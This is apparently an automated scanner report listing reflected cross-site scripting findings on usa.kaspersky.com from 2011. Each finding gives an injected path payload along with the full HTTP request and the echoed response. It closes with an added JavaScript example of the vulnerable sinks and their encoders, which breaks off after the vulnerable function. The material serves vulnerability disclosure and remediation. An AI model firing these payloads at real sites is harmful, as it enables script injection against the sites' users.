s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com5fb10"-alert(1)-"62f5664cc26/files/css_injector_144.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.58. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b936e"><script>alert(1)</script>356d95627ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comb936e"><script>alert(1)</script>356d95627ba/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387708"
Content-Type: text/html; charset=utf-8
Content-Length: 37522
Date: Sun, 23 Oct 2011 16:35:15 GMT
X-Varnish: 1652563130
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comb936e"><script>alert(1)</script>356d95627ba/files/css_injector_144.css?3" />
...[SNIP]...

1.59. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1997"-alert(1)-"87704505a68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/filesd1997"-alert(1)-"87704505a68/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387797"
Content-Type: text/html; charset=utf-8
Content-Length: 40324
Date: Sun, 23 Oct 2011 16:36:41 GMT
X-Varnish: 1652568202
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesd1997"-alert(1)-"87704505a68/css_injector_144.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.60. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc0e"><script>alert(1)</script>038718c3d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files1cc0e"><script>alert(1)</script>038718c3d0/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387773"
Content-Type: text/html; charset=utf-8
Content-Length: 40466
Date: Sun, 23 Oct 2011 16:36:25 GMT
X-Varnish: 1652566706
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files1cc0e"><script>alert(1)</script>038718c3d0/css_injector_144.css?3" />
...[SNIP]...

1.61. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f4"><script>alert(1)</script>c861ee1c24e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_144.css623f4"><script>alert(1)</script>c861ee1c24e?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387817"
Content-Type: text/html; charset=utf-8
Content-Length: 37876
Date: Sun, 23 Oct 2011 16:37:02 GMT
X-Varnish: 1652569061
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css623f4"><script>alert(1)</script>c861ee1c24e?3" />
...[SNIP]...

1.62. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac54c"-alert(1)-"de408bbf3a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/files/css_injector_144.cssac54c"-alert(1)-"de408bbf3a8?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387835"
Content-Type: text/html; charset=utf-8
Content-Length: 39279
Date: Sun, 23 Oct 2011 16:37:19 GMT
X-Varnish: 1652569954
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.cssac54c"-alert(1)-"de408bbf3a8?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.63. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14f39"-alert(1)-"a6b00befd51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites14f39"-alert(1)-"a6b00befd51/usa.kaspersky.com/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387298"
Content-Type: text/html; charset=utf-8
Content-Length: 39506
Date: Sun, 23 Oct 2011 16:28:25 GMT
X-Varnish: 1652542679
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites14f39"-alert(1)-"a6b00befd51/usa.kaspersky.com/files/css_injector_153.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.64. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d05"><script>alert(1)</script>acfec7ce059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites20d05"><script>alert(1)</script>acfec7ce059/usa.kaspersky.com/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:27:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387251"
Content-Type: text/html; charset=utf-8
Content-Length: 37546
Date: Sun, 23 Oct 2011 16:27:46 GMT
X-Varnish: 1652539869
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites20d05"><script>alert(1)</script>acfec7ce059/usa.kaspersky.com/files/css_injector_153.css?3" />
...[SNIP]...

1.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3561"-alert(1)-"21929865d5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.comd3561"-alert(1)-"21929865d5e/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387423"
Content-Type: text/html; charset=utf-8
Content-Length: 38721
Date: Sun, 23 Oct 2011 16:30:43 GMT
X-Varnish: 1652549102
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comd3561"-alert(1)-"21929865d5e/files/css_injector_153.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b86a2"><script>alert(1)</script>e0a071fa1d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comb86a2"><script>alert(1)</script>e0a071fa1d7/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387393"
Content-Type: text/html; charset=utf-8
Content-Length: 37522
Date: Sun, 23 Oct 2011 16:29:59 GMT
X-Varnish: 1652547954
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comb86a2"><script>alert(1)</script>e0a071fa1d7/files/css_injector_153.css?3" />
...[SNIP]...

1.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7ab2"><script>alert(1)</script>7f0af06d8a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/filese7ab2"><script>alert(1)</script>7f0af06d8a8/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:33:03 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387583"
Content-Type: text/html; charset=utf-8
Content-Length: 40475
Date: Sun, 23 Oct 2011 16:33:12 GMT
X-Varnish: 1652555698
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/filese7ab2"><script>alert(1)</script>7f0af06d8a8/css_injector_153.css?3" />
...[SNIP]...

1.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 3 (the third path segment, files) is copied into a JavaScript string which is encapsulated in double quotation marks: the s.pageName="404:..." assignment in the page's inline analytics script. The payload a5359"-alert(1)-"cd57c50c64d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response, a 404 page served as text/html, so the first double quote terminates the string literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/usa.kaspersky.com/filesa5359"-alert(1)-"cd57c50c64d/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:33:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387615"
Content-Type: text/html; charset=utf-8
Content-Length: 40324
Date: Sun, 23 Oct 2011 16:33:48 GMT
X-Varnish: 1652557559
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesa5359"-alert(1)-"cd57c50c64d/css_injector_153.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
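The two sinks behind findings 1.67 and 1.68 are the same request URI copied into a double-quoted attribute and into a double-quoted JavaScript string. The following is an added example, not code from the report or from usa.kaspersky.com: it rebuilds both sinks as a minimal server-side template, first as the report observed them (raw concatenation of the request URI) and then with output encoding matched to each context, and checks the report's own payloads against both versions. The hostname, the page layout and the helper names are assumptions chosen to mirror the response snippets above.

```javascript
// Added example, not code from the XSS.CX report or from usa.kaspersky.com.
// It rebuilds the two sinks the report shows on the 404 page (the canonical
// <link href> and the s.pageName JavaScript string) as a small server-side
// template: first as observed (raw concatenation of the request URI), then
// with context-specific output encoding. The hostname and page layout are
// assumptions chosen to mirror the report's response snippets.

// Payloads copied verbatim from findings 1.67 and 1.68.
const ATTR_PAYLOAD = 'e7ab2"><script>alert(1)</script>7f0af06d8a8';
const JS_PAYLOAD = 'a5359"-alert(1)-"cd57c50c64d';

// Encoder for a double-quoted HTML attribute value. The five characters that
// can close the attribute, open a tag or start an entity are replaced.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for a JavaScript string literal emitted inside an inline <script>.
// JSON.stringify escapes quotes and backslashes and adds the surrounding
// quotes; "</" is additionally escaped so the HTML parser can never see a
// "</script>" inside the literal, and U+2028/U+2029 so the JS parser cannot
// see a line terminator inside it.
function escapeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The report's two sinks as observed: the request URI is copied unchanged
// into an attribute and into a JavaScript string.
function renderNotFoundVulnerable(requestUri) {
  const url = 'http://usa.kaspersky.com' + requestUri;
  return [
    `<link rel="canonical" href="${url}" />`,
    `<script>s.pageName="404:${url}";</script>`,
  ].join('\n');
}

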